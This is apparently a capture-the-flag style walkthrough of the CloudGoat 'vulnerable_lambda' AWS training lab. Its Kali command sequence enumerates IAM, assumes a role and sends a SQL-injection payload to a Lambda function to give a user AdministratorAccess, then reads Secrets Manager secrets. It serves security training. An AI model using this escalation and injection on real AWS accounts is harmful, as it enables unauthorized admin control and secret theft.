CloudGoat: vulnerable_lambda
4 min readMay 7, 2024
Note:
- We will be performing our attack via Kali Linux
- Ensure you have done the pre-requisites before you start the lab
1. Preparation
1.1 Launch the scenario:
┌──(root㉿kali)-[~]
└─# cd /opt/cloudgoat┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py create vulnerable_lambda1.2 Read the start.txt file
┌──(root㉿kali)-[/opt/cloudgoat]
└─# cd vulnerable_lambda*
┌──(root㉿kali)-[/opt/cloudgoat/vul...]
└─# cat start.txt
Access Key ID = AAAABBBBCCCCDDDD
Access Secret Key = 1111222233331.3 Create profile for bilbo user
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws configure --profile bilbo
AWS Access Key ID: AAAABBBBCCCCDDDD
AWS Secret Access Key: 111122223333
Default region name:
Default output format:2. Enumeration
2.1 whoami
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws sts get-caller-identity --profile bilbo --region us-east-1
{
"UserId": "...",
"Account": "...",
"Arn": arn:aws:iam:1234:user/cg-bilbo-vulnerable-lambda-cgidxqb9uign6
}- arn = arn:aws:iam:1234:user/cg-bilbo-vulnerable-lambda-cgidxqb9uign6
- username = cg-bilbo-vulnerable-lambda-cgidxqb9uign6
2.2: list the policies
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws list-user-policies --user-name cg-bilbo-vulnerable-lambda-cgidxqb9uign6 --profile bilbo --region us-east-1
{
"PolicyNames": [cg-bilbo-vulnerable_lambda_cgidxqb9uign6-standard-user-assumer]
}2.3: show the details of the policy
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam get-user-policy --user-name cg-bilbo-vulnerable_lambda_cgidxqb9uign6 --policy-name cg-bilbo-vulnerable_lambda_cgidxqb9uign6-standard-user-assumer --profile bilbo --region us-east-1
{
... ... ...
{
"Action": "sts:AssumeRole",
"Effect": "Allow",
"Resource": "arn:aws:iam:yyy:role/cg-lambda-invoker*"
"Sid": ""
}
... ... ...
}2.4: list the roles in your account, filter by CloudGoat (ie, start with “cg-”)
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 iam list-roles | grep cg-
... ... ...
"RoleName": "cg-lambda-invoker-vulnerable_lambda_cgidxqb9quign6",
"Arn": "arn:aws:iam:yyy:role/cg-lambda-invoker-vulnerable_lambda_cgidxqb9quign6",
... ... ...2.5: list the policies for that role
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 iam list-role-policies --role-name cg-lambda-invoker-vulnerable_lambda_cgidxqb9quign6
{
"PolicyNames": ["lambda-invoker"]
}3. Exploitation
3.1: assume the role
- FYI, when we assume a role, it will return us a set of temporary security credentials that we can use to access AWS resources that you might not have access to otherwise. These temporary credentials consist of an access key ID, a secret access key, and a security token.
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 sts assume-role --role-arn arn:aws:iam:yyy:role/cg-lambda-invoker-vulnerable_lambda_cgidxqb9quign6 --role-session-name cloudgoat-session1
{
"Credentials": {
"AccessKeyId": "AAA123123",
"SecretAccessKey": "BBB123123",
"SessionToken": "CCC123123",
... ... ...
}
}- we got the credentials for the CloudGoat role that can invoke the lambda
- let’s create a new profile based on these credentials
3.2: create new profile for the temporary credentials
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws configure --profile vulnlambda
AWS Access Key ID: AAA123123
AWS Secret Access Key: BBB123123
Default region name:
Default output format:- we only update the Access Key ID and Secret Access key, what about the session token?
- we have to manually add it into the credentials file
┌──(root㉿kali)-[/opt/cloudgoat]
└─# mousepad /root/.aws/credentials┌──(root㉿kali)-[/opt/cloudgoat]
└─# cat /root/.aws/credentials
[...]
... ... ...
[bilbo]
aws_access_key_id = AAAABBBBCCCCDDDD
aws_secret_access_key = 111122223333
[vulnlambda]
aws_access_key_id = AAA123123
aws_secret_access_key = BBB123123
aws_session_token = CCC1231233.3: list the lambda functions
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile vulnlambda --region us-east-1 lambda list-functions
{
"Functions": [
"FunctionName": "vulnerable_lambda_cgidxqb9quign6-policy_applier_lambda1",
... ... ...
]
}3.4: Return details of that function
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile vulnlambda --region us-east-1 lambda get-function --function-name vulnerable_lambda_cgidxqb9quign6-policy_applier_lambda1
{
"Configuration": {
...
...
"code": "https://xxxyyyzzz",
...
...
}
}- we found a URL
- upon open that URL, we downloaded a zip file
- we unzip that zip file, and found many source code inside, one of them is the main.py
- note at line 15, AdministratorAccess = false
3.5: send SQLi payload to the lambda function
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile vulnlambda --region us-east-1 lambda invoke --function-name vulnerable_lambda_cgidxqb9quign6-policy_applier_lambda1 --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess'"'"' --"], "user_name": "cg-bilbo-vulnerable-lambda-cgidxqb9uign6"}' out.txt
{
"StatusCode": 200
... ... ...
}┌──(root㉿kali)-[/opt/cloudgoat]
└─# cat out.txt
"All managed policies were applied as expected".- we have granted “AdministratorAccess” permission to bilbo user
- bilbo is now an admin
3.6: list the secrets in secretsmanager
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 secretsmanager list-secrets
{
"SecretLists": [
{
"Arn": "arn:aws:secretsmanager:us-east-1:xxx:secret:yyyzzz",
... ... ...
... ... ...
}
]
}┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 secretsmanager get-secret-value --secret-id arn:aws:secretsmanager:us-east-1:xxx:secret:yyyzzz
{
... ... ...
... ... ...
}4. Clean up
┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py destroy vulnerable_lambda --help
Destroy "xxx" ? [y/n]: y
